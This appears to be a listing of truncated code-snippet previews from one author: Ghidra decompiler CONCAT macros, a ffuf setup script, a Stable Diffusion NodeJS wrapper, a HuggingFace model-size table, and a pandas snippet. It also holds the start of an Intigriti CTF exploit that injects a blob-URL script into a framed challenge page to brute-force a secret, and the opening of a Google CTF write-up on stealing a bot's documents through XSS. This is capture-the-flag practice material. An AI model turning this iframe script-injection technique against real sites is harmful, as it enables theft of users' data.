| // Author: Sean Pesce | |
| // | |
| // Manual implementations of the CONCAT operations produced by the Ghidra decompiler. | |
| // These definitions are helpful for compiling re-implementations of native code using | |
| // decompiler output (e.g., with gcc). | |
| // | |
| // Note that these implementations would be outperformed by minimal C preprocessor macros | |
| // that replicate the same logic. | |
| #include <stdio.h> | |
| #define IS_DIG(x) (((x)|1)=='1') | |
| #define SLEN(s) ((sizeof s)-1) | |
| #define RIDX(s,x) ((x)<SLEN(s)?s[SLEN(s)-1-(x)]:0) | |
| #define CNT(s,x,n) ((x)<n?IS_DIG(RIDX(s,(x))):0) | |
| #define CNT4(s,x,n) (CNT(s,x+0,n)+CNT(s,x+1,n)+CNT(s,x+2,n)+CNT(s,x+3,n)) | |
| #define CNT16(s,x,n) (CNT4(s,x+0,n)+CNT4(s,x+4,n)+CNT4(s,x+8,n)+CNT4(s,x+12,n)) | |
| #define CNT64(s,x,n) (CNT16(s,x+0,n)+CNT16(s,x+16,n)+CNT16(s,x+32,n)+CNT16(s,x+48,n)) | |
| #define VAL(s,x) ((RIDX(s,x)=='1')<<(CNT64(s,0,x))) | |
| #define VAL4(s,x) (VAL(s,x+0)+VAL(s,x+1)+VAL(s,x+2)+VAL(s,x+3)) |
| <html> | |
| <body> | |
| <iframe src="https://challenge-0922.intigriti.io/challenge/index.php" style="width:100vw; height: 100vh"></iframe> | |
| <script> | |
| document.querySelector("iframe").onload = () => { | |
| document.querySelector("iframe").contentWindow.frames[0].location = URL.createObjectURL(new Blob([` | |
| <script> | |
| (async () => { | |
| let alphabet = "0123456789abcdef".split(""); | |
| let known = ""; |
| # Before the first run, read the comments and change the script for your company | |
| # Before anything, install ffuf with `go install github.com/ffuf/ffuf@latest` | |
| # Change the WEBROOT variable below to the location of the webroot | |
| WEBROOT=/var/www/html/CHANGE/ME | |
| # This changes to the webroot directory | |
| cd $WEBROOT | |
| # This makes a directory for storing the files used for this script. Change it to be whatever path you want. | |
| PROJPATH=/home/changeme/project | |
| mkdir -p $PROJPATH |
| /** | |
| * General-purpose NodeJS CLI/API wrapping the Stable-Diffusion python scripts. | |
| * | |
| * Note that this uses an older fork of stable-diffusion | |
| * with the 'txt2img.py' script, and that script was modified to | |
| * support the --outfile command. | |
| */ | |
| var { spawn, exec } = require("child_process"); | |
| var path = require("path"); |
This table documents the top-5000 most download HuggingFace models (during 8/8/2022-9/8/2022) sorted by their sizes. Note that some models that are not Huggingface transformers compatible won't be listed here.
| Model | #Parameters |
|---|---|
| bigscience/bloom | 176.2B |
| bigscience/bloom-petals | 176.2B |
| facebook/opt-66b | 65.7B |
This google-ctf I couldn't solve any web challenges because I spent too much time trying dns-leaking on log4j challenge while the solution was to leak it thru the error logs. Near the end of ctf, I tried out this sandbox challenge and solved it. I will try sharing my journey for this flag with you.
The rumor tells that adm1n stores their secret split into multiple documents. Can you catch 'em all? https://postviewer-web.2022.ctfcompetition.com
The challenge consisted of an all client-side simple page, i.e. no backend code was involved. A user can upload any file which will be then locally stored in indexedDB. They can preview their files by either clicking on the title or by visiting file's URL, for example https://postviewer-web.2022.ctfcompetition.com/#file-01d6039e3e157ebcbbf6b2f7cb2dc678f3b9214d. The preview of the file is rendered inside a blob created from data: URL. The rendering occurs by sending file's contents to the iframe via postMessage({ body, mimeType }, '*')
Additionally, there is a /bot endpoint which lets players send URLs to an xss-bot imitating another user. The goal is to steal their documents.
| # Requires fsspec. Sometimes installed, sometimes not. | |
| # -- | |
| # Remote | |
| # python -m http.server | |
| # | |
| # Serving HTTP on :: port 8000 (http://[::]:8000/) | |
| import pandas as pd |
